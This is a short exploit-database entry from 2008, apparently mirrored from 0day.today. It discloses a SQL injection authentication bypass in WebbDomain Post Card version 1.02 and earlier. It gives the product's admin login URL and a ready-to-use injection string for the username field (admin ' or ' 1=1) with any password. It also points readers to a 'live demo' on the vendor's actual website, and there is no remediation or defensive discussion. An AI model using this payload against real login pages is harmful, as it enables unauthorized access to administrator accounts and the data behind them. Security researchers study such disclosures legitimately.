id: 4066
date: 11/04/2008
title: WEBBDOMAIN Post Card <= 1.02 (SQL Injection) Auth Bypass Vuln
author: x0r
cves: 

=============================================================
WEBBDOMAIN Post Card <= 1.02 (SQL Injection) Auth Bypass Vuln
=============================================================


-==============================-
 Autore: x0r - Road Crew 
Cms: WebbDomain Web Postcards
Bug: Auth ByPass 
Site Of Seller: http://webbdomain.com
 -==============================- 
Exploit: http://webbdomain.com/php/postcarden/admin

Username: admin ' or ' 1=1 
Pass: x0r 

Live Demo: http://webbdomain.com/php/postcarden/admin/admin.php
 
Greetz: La Mia Bimb4...8\10\08 Ti AmO 



#  0day.today [2023-03-25]  #